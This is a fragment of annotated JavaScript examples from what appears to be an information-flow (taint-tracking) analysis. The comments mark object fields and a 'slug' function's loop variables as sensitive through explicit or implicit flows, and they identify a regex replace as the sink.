    this.operand = operand                 //marked as sensitive due to explicit flow
    this.parts = parts                     //marked as sensitive due to implicit flow
    this.implicitField = implicitField     //marked as sensitive due to implicit flow
}


==> results/gnuplot/simplified-34.js <==
function slug(string, opts) { //string is marked as sensitive
//...
for (var char, i = 0, l = string.length; i < l; i++) {    // an upgrade statement is inserted in the second iteration at i++
   char = string[i];                                      // char becomes secret due to an explicit flow
   //... a lot of processing that translate to implicit flows     
   result += char;
}
result = result.replace(/^\s+|\s+$/g, '');               // the sink

